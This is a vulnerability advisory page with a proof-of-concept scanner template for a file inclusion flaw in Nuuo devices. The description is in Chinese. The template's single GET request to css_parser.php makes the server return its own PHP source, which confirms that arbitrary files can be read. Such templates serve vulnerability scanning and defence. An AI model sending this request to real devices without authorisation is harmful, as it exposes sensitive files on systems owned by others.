nuuo-file-inclusion: Nuuo file inclusion

2025-08-01 nuuo-file-inclusion PoC Public

Description

Nuuo 存在文件包含漏洞,攻击者可以通过构造恶意请求,包含任意文件,导致敏感信息泄露。

PoC

id: nuuo-file-inclusion

info:
  name: Nuuo file inclusion
  author: "2357000166"
  severity: high
  verified: true
  description: |-
    Nuuo 存在文件包含漏洞,攻击者可以通过构造恶意请求,包含任意文件,导致敏感信息泄露。
  tags: nuuo,file-inclusion
  created: 2024/06/25

rules:
  r0:
    request:
      method: GET
      path: /css_parser.php?css=css_parser.php
    expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']")
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities